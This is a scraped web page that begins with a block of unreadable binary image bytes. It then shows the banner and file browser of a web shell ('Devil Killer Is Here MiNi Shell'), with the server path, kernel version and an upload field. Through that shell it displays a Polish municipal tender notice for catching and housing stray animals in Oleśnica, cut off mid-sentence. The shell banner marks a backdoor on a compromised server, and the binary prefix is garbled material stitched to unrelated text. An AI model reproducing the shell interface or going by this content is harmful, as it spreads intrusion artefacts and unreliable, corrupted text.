JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20231109/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20231109/0048586501-N-2023.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Wyłapywanie i transport bezdomnych zwierząt z terenu Gminy Miasto Oleśnica oraz objęcie ich opieką przed przewiezieniem do schroniska w roku 2024 </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gmina Miasto Oleśnica</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 931934733</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Rynek-Ratusz</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Oleśnica</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">56-400</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">dolnośląskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL518 - Wrocławski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">kancelaria@um.olesnica.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.olesnica.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Wyłapywanie i transport bezdomnych zwierząt z terenu Gminy Miasto Oleśnica oraz objęcie ich opieką przed przewiezieniem do schroniska w roku 2024 </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-b482b65e-7ef0-11ee-9aa3-96d3b4440790</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2023/BZP 00485865</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2023-11-09</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2023/BZP 00065306/01/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.5 Wyłapywanie bezdomnych zwierząt</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/transakcja/844981 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">Postępowanie prowadzone jest pod adresem:<br/>https://platformazakupowa.pl/pn/olesnica .Komunikacja między Zamawiającym a Wykonawcami odbywa się przy użyciu ww.<br/>platformy. Oferta oraz wszelkie dokumenty elektroniczne, oświadczenia, wnioski lub elektroniczne kopie dokumentów, oświadczeń<br/>lub wniosków, składane są przez Wykonawcę za pomocą Platformy Zakupowej. W sytuacjach awaryjnych w szczególności w<br/>przypadku braku działania Platformy zakupowej, Zamawiający dopuszcza również komunikację za pomocą poczty elektronicznej (z<br/>zastrzeżeniem składania oferty, dla której jedynym dopuszczalnym sposobem złożenia jest przesłanie jej za pośrednictwem<br/>Platformy Zakupowej. W takim przypadku Wykonawca zobowiązany jest przesłać dokumenty na adres e-mail:<br/>kancelaria@um.olesnica.pl lub b.strzala@um.olesnica.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1. Komunikacja w postępowaniu<br/>między Zamawiającym a Wykonawcami odbywa się przy użyciu Platformy Zakupowej https://platformazakupowa.pl/pn/olesnica<br/>tj. oferta oraz wszelkie dokumenty elektroniczne, oświadczenia, wnioski lub elektroniczne kopie dokumentów, oświadczeń lub<br/>wniosków, o których mowa w niniejszej SWZ, składane są przez Wykonawcę za pośrednictwem<br/>https://platformazakupowa.pl/pn/olesnica.<br/>2. Zamawiający będzie przekazywał wykonawcom informacje za pośrednictwem Platforma zakupowej. Informacje dotyczące<br/>odpowiedzi na pytania, zmiany specyfikacji, zmiany terminu składania i otwarcia ofert Zamawiający będzie zamieszczał na<br/>platformie w sekcji “Komunikaty”. Korespondencja, której zgodnie z obowiązującymi przepisami adresatem jest konkretny<br/>wykonawca, będzie przekazywana za pośrednictwem Platformy zakupowej do konkretnego wykonawcy.<br/>3, Wykonawca jako podmiot profesjonalny ma obowiązek sprawdzania komunikatów i wiadomości bezpośrednio na<br/>platformazakupowa.pl przesłanych przez zamawiającego, gdyż system powiadomień może ulec awarii lub powiadomienie może<br/>trafić do folderu SPAM.<br/>4. Zamawiający, zgodnie z Rozporządzeniem Prezesa Rady Ministrów z dnia 30 grudnia 2020r. w sprawie sposobu sporządzania i<br/>przekazywania informacji oraz wymagań technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej w<br/>postępowaniu o udzielenie zamówienia publicznego lub konkursie (Dz. U. z 2020r. poz. 2452), określa niezbędne wymagania<br/>sprzętowo - aplikacyjne umożliwiające pracę na Platformie zakupowej, tj.:<br/>1) stały dostęp do sieci Internet o gwarantowanej przepustowości nie mniejszej niż 512 kb/s,<br/>2) komputer klasy PC lub MAC o następującej konfiguracji: pamięć min. 2 GB Ram, procesor Intel IV 2 GHZ lub jego nowsza wersja,<br/>jeden z systemów operacyjnych - MS Windows 7, Mac Os x 10 4, Linux, lub ich nowsze wersje,<br/>3) zainstalowana dowolna, inna przeglądarka internetowa niż Internet Explorer,<br/>4) włączona obsługa JavaScript,<br/>5) zainstalowany program Adobe Acrobat Reader lub inny obsługujący format plików .pdf,<br/>6) Szyfrowanie na platformazakupowa.pl odbywa się za pomocą protokołu TLS 1.3.<br/>7) Oznaczenie czasu odbioru danych przez platformę zakupową stanowi datę oraz dokładny czas (hh:mm:ss) generowany wg. czasu<br/>lokalnego serwera synchronizowanego z zegarem Głównego Urzędu Miar.<br/>4.Zamawiający informuje, że instrukcje korzystania z Platformy zakupowej dotyczące w szczególności logowania, składania<br/>wniosków o wyjaśnienie treści SWZ, składania ofert oraz innych czynności podejmowanych w niniejszym postępowaniu przy użyciu<br/>Platformy zakupowej znajdują się w zakładce „Instrukcje dla Wykonawców&#34; na stronie internetowej pod adresem:<br/>https://platformazakupowa.pl/strona/45-instrukcje</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Klauzula RODO zgodnie z SWZ</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Klauzula RODO zgodnie z SWZ</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZP/TP/17/2023</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> wyłapania bezdomnych zwierząt, ich transportu oraz opieki przed przewiezieniem ich do schroniska. Zamówienie obejmuje:<br/>•	całodobowa gotowość do wyłapywania bezdomnych zwierząt w tym również w soboty oraz dni ustawowo wolne od pracy;<br/>•	wyłapanie bezdomnych zwierząt wraz z ich transportem do miejsca przetrzymywania wyłapanych zwierząt przed przewiezieniem do schroniska;<br/>•	przetrzymywanie zwierząt polegające na opiece nad nimi i ich utrzymaniu.<br/>2.	Warunki wykonania zamówienia:<br/>1)	Wykonawca udostępnienia numeru telefonu pod którym Zamawiający i podmioty przez niego wskazane, będą zgłaszać potrzebę wykonania przedmiotu zamówienia. Numer ten będzie dostępny 24 godziny na dobę, siedem dni w tygodniu (również w soboty i dni ustawowo wolne od pracy).<br/>2)	Czas reakcji (podjęcie działań zmierzających do wyłapania zwierzęcia w miejscu jego przebywania) od zgłoszenia w zadeklarowanym przez Wykonawcę terminie, lecz nie dłuższym niż 2 godziny.<br/>3)	Wyłapanie zwierzęcia przez Wykonawcę następuje natychmiast po otrzymaniu zgłoszenia jeżeli dotyczy ono zwierzęcia stwarzającego poważne zagrożenie dla ludzi lub innych zwierząt, w szczególności zachowujące się agresywnie albo którego zachowanie lub wygląd wskazuje na możliwość zarażenia wścieklizną lub inną chorobą.<br/>4)	Wykonawca zapewnienia we własnym zakresie urządzeń i środków, przy których pomocy zwierzęta będą wyłapywane, które nie stwarzają zagrożenia dla ich życia i zdrowia ani nie zadają im cierpienia.<br/>5)	Wykonawca zapewnia we własnym zakresie w razie potrzeby pomocy lekarsko-<br/>-weterynaryjną podczas przeprowadzanej akcji wyłapania i transportu zwierząt.<br/>6)	Po wyłapaniu Wykonawca poddaje zwierzę oględzinom, których celem jest ustalenie danych jego właściciela lub opiekuna. W przypadku ustalenia danych właściciela lub opiekuna Wykonawca informuje go o miejscu przetrzymywania zwierzęcia i niezwłocznie przekaże zwierzę. Wydanie zwierzęcia następuje na terenie Oleśnicy o każdej porze doby, siedem dni w tygodniu (również w soboty i dni ustawowo wolne od pracy) co zostanie stwierdzone protokołem.<br/>7)	Wykonawca przesyła Zamawiającemu informację e-mailem maksymalnie do godziny 1200 następnego dnia roboczego od dnia zaistnienia zdarzenia o każdym wyłapanym zwierzęciu, każdym wydanym zwierzęciu, każdym padłym lub uśpionym zwierzęciu.<br/>8)	Wykonawca będzie transportował zwierzęta, w sposób pozwalający zapobiec zranieniu i cierpieniu oraz zapewniający bezpieczeństwo zwierząt, do prowadzonego przez siebie miejsca przetrzymywania wyłapanych zwierząt przed przewiezieniem do schroniska lub w inne miejsce wskazane przez Zamawiającego. <br/>9)	Miejsce przetrzymywania wyłapanych zwierząt przed przewiezieniem do schroniska jest prowadzone i utrzymywane przez Wykonawcę. Warunki w miejscu przetrzymywania:<br/>•	co najmniej 10 kojców chroniących zwierzęta przed zimnem, upałami i opadami atmosferycznymi, z dostępem do światła dziennego, umożliwiające swobodną zmianę pozycji ciała. Ściany, podłogi i drzwi kojców powinny być wykonane w sposób uniemożliwiający ucieczkę zwierząt, z trwałych materiałów umożliwiających mycie i odkażanie oraz niepowodujących urazów lub uszkodzeń ciała u zwierząt,<br/>•	czyszczenie co najmniej raz dziennie pomieszczeń i kojców, w których są utrzymywane zwierzęta, w tym również urządzeń do pojenia i karmienia.<br/>•	przeprowadzanie dezynsekcji pomieszczeń w których przebywają zwierzęta, nie rzadziej niż raz na miesiąc.<br/>•	zapewnienie stałego dostępu dla zwierząt do wody zdatnej do picia,<br/>•	karmienie zwierząt nie rzadziej niż raz dziennie odpowiednią dla nich karmą lub według zaleceń lekarza weterynarii,<br/>•	zapewnienie opieki weterynaryjnej zwierzętom chorym i rannym,<br/>•	codzienna pielęgnacja zwierzęcia zapewniana poprzez kontrolę dobrostanu, czesanie i w zależności od kondycji zwierzęcia kąpiel,<br/>•	codzienny spacer zwierzęcia, jeżeli jego stan zdrowia na to pozwala.<br/>10)	Wykonawca transportuje wyłapane zwierzęta do wskazanego przez Zamawiającego lekarza weterynarii najpóźniej w ciągu 3 dni roboczych od daty wyłapania.<br/>11)	Zwierzęta są przetrzymywane pod opieką Wykonawcy do czasu przekazania ich do schroniska, prawowitemu właścicielowi, jak również w sytuacji, gdy przekazanie nastąpi w inne miejsce uzgodnione uprzednio z Zamawiającym. <br/>12)	Wykonawca zobowiązany jest do założenia każdemu wyłapanemu zwierzęciu i aktualizowanie na bieżąco karty informacyjnej według wzoru określonego przez Zamawiającego.<br/>13)	W przypadku konieczności dokonania zabiegu ratującego życie lub zdrowie zwierzęcia, jak również pozostawienia go na okres leczenia w innym podmiocie leczniczym niż ten z którym Zamawiający ma zawartą umowę, Zamawiający musi najpierw wyrazić zgodę na podjęcie leczenia w danym podmiocie. Rozliczenie za leczenie zwierzęcia dokonuje się bezpośrednio między Zamawiającym, a podmiotem leczniczym.<br/>14)	Wykonawca naprawi bądź pokryje koszty naprawy wszelkich szkód wynikłych w trakcie wykonywania umowy. Za szkody w stosunku do osób trzecich odpowiada Wykonawca.<br/><br/>Uśrednione dane ilościowe w skali roku dotyczące realizacji ww. zamówienia:<br/>Opis zadań do realizacji w ramach zamówienia	Jednostka	Ilości w roku<br/>Całodobowa gotowość do wyłapywania zwierzęcia	miesiąc	12<br/>Wyłapane zwierzęta bezdomne	sztuka	95<br/>Czas przebywania wszystkich zwierząt w miejscu przetrzymania przed przewiezieniem do schroniska	dzień	1 219<br/><br/>Wspólny Słownik Zamówień (CPV): 98380000-0 - Usługi psiarni<br/><br/>Uzasadnienie niedokonania podziału zamówienia na części:<br/><br/>Zamawiający zrezygnował z podziału zamówienia na części dlatego, iż na podstawie § 5 ust. 2 rozporządzenie Ministra Spraw Wewnętrznych i Administracji z dnia 26 sierpnia 1998 r. w sprawie zasad i warunków wyłapywania bezdomnych zwierząt (Dz.U. z 1998 r. Nr 116 poz. 753) umowa na przeprowadzenie wyłapywania zwierząt bezdomnych powinna zawierać w szczególności:<br/>1)	wskazanie urządzeń i środków, przy których pomocy zwierzęta będą wyłapywane,<br/>2)	określenie środków do przewozu zwierząt,<br/>3)	zapewnienie, w razie potrzeby, pomocy lekarsko-weterynaryjnej,<br/>4)	wskazanie miejsca przetrzymywania wyłapanych zwierząt przed przewiezieniem do schroniska.<br/>W związku z tym, iż prawodawca wymaga, aby zadania związane z wyłapaniem, przewozem/transportem i przetrzymaniem zwierząt przed przewiezieniem ich do schroniska były zawarte w umowie z jednym podmiotem, zasadne jest ogłoszenie tylko jednego postępowania na realizację wszystkich wyżej opisanych zadań.<br/><br/>3.	Zamawiający informuje, że w niniejszym postępowaniu nie dopuszcza się składania ofert wariantowych oraz:<br/>1)	nie dopuszcza możliwości złożenia ofert w postaci katalogów elektronicznych lub dołączenia katalogów elektronicznych do oferty,<br/>2)	nie zastrzega osobistego wykonania przez wykonawcę kluczowych zadań,<br/>3)	nie przewiduje:<br/>a) udzielania zamówień, o którym mowa w art. art. 214 ust. 1 pkt 7 i 8<br/>b)	zawarcia umowy ramowej, o której mowa w art. 311–315 ustawy Pzp.<br/>c)	rozliczenia w walutach obcych,<br/>d)	aukcji elektronicznej, o której mowa w art. 308 ust. 1 ustawy Pzp.<br/>e)	zwrotu kosztów udziału w postępowaniu,<br/>f)	określenia w opisie przedmiotu zamówienia wymagań związanych z realizacją zamówienia, o których mowa w art. 96 ust. 2 pkt 2 ustawy Pzp,<br/>g)	zastrzeżenia możliwości ubiegania się i udzielenie zamówienia wyłącznie przez Wykonawców, o których mowa w art. 94 ustawy Pzp,<br/>h)	udzielenia zaliczek na poczet wykonania zamówienia. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">98380000-0 - Usługi psiarni</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2024-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> O udzielenie niniejszego zamówienia mogą ubiegać się wykonawcy, którzy:<br/>1.	nie podlegają wykluczeniu zgodnie z rozdz. XI SWZ i ogłoszeniem<br/>2.	spełniają określone przez Zamawiającego warunki udziału w postępowaniu.<br/><br/>Warunki udziału w postępowaniu, opis sposobu dokonywania oceny spełniania tych warunków<br/>3.	Wykonawcy ubiegający się o zamówienie publiczne muszą spełniać niżej wymienione warunki udziału w postępowaniu dotyczące:<br/>1) zdolności do występowania w obrocie gospodarczym: Zamawiający nie stawia w tym zakresie warunku<br/>2) uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów: <br/>a)	Wykonawca musi posiadać zezwolenie, o którym mowa w art. 10 ust. 1 lub w art. 11 ust. 1 rozporządzenia nr 1/2005 z dnia 22 grudnia 2004 r. w sprawie ochrony zwierząt podczas transportu i związanych z tym działań oraz zmieniającym dyrektywy 64/432/EWG i 93/119/WE oraz rozporządzenie (WE) nr 1255/97 (Dz. Urz. UE L 3 z 05.01.2005, str. 1)<br/>b)	musi posiadać zezwolenie udzielone w formie decyzji na prowadzenie działalności o której mowa w art. 7 ust. 1 pkt 3 ustawy o utrzymaniu czystości i porządku w gminach (tekst jedn. Dz. U. z 2022 r. poz. 2519),<br/>3.	sytuacji ekonomicznej lub finansowej: Zamawiający nie stawia w tym zakresie warunku<br/>4.	zdolności technicznej lub zawodowej: <br/>a)	Wykonawca spełni warunek, jeżeli wykaże że dysponuje lub będzie dysponował: min. 2 osobami, posiadającymi licencje dla kierowców i osób obsługujących zgodnie z art. 17 ust. 2 rozporządzenia nr 1/2005 z dnia 22 grudnia 2004 r. w sprawie ochrony zwierząt podczas transportu i związanych z tym działań oraz zmieniającym dyrektywy 64/432/EWG i 93/119/WE oraz rozporządzenie (WE) nr 1255/97 (Dz. Urz. UE L 3 z 05.01.2005, str. 1),.<br/>b)	Dysponuje następującym sprzętem:<br/>	miejscem przetrzymywania wyłapanych zwierząt przed przewiezieniem do schroniska, które spełnia warunki określone w Opisie Przedmiotu Zamówienia<br/>	1 szt. - specjalistyczny środek transportu dopuszczony przez powiatowego lekarza weterynarii do przewozu zwierząt i ujawniony w rejestrze zezwoleń przewoźników wydanych zgodnie z artykułem 10 lub artykułem 11 rozporządzenia nr 1/2005 z dnia 22 grudnia 2004 r. w sprawie ochrony zwierząt podczas transportu i związanych z tym działań oraz zmieniającym dyrektywy 64/432/EWG i 93/119/WE oraz rozporządzenie (WE) nr 1255/97 (Dz. Urz. UE L 3 z 05.01.2005, str. 1), 2 szt. - Transporter kenelowy, większy dla psów, 5 szt. - Transporter mniejszy dla kotów i małych psów, 1 szt. - Żywołapka do łapania kotów, 1 szt. - Żywołapka do łapania psów, 1 szt. - Podbierak do łapania zwierząt do max 20 kg,1 szt. - Duża siatka do łapania.<br/>c)	Zamawiający, w stosunku do Wykonawców wspólnie ubiegających się o udzielenie zamówienia, w odniesieniu do warunku dotyczącego zdolności technicznej lub zawodowej dopuszcza łączne spełnianie warunków przez Wykonawców.<br/>5.	Zamawiający może na każdym etapie postępowania uznać, że Wykonawca nie posiada wymaganych zdolności, jeżeli posiadanie przez Wykonawcę sprzecznych interesów, w szczególności zaangażowanie zasobów technicznych lub zawodowych Wykonawcy w inne przedsięwzięcia gospodarcze Wykonawcy może mieć negatywny wpływ na realizację zamówienia<br/>6.	Zgodnie z art. 118 pzp, wykonawca może w celu potwierdzenia spełniania warunków udziału w postępowaniu, polegać na zdolnościach technicznych lub zawodowych lub sytuacji finansowej lub ekonomicznej podmiotów udostępniających zasoby, niezależnie od charakteru prawnego łączących go z nimi stosunków prawnych. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">a) Oświadczenia<br/>Wykonawcy, w zakresie art. 108 ust. 1 pkt 5 ustawy Pzp, o braku przynależności do tej samej grupy kapitałowej w rozumieniu ustawy<br/>z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów, z innym Wykonawcą, który złożył odrębną ofertę, ofertę częściową,<br/>albo oświadczenia o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami 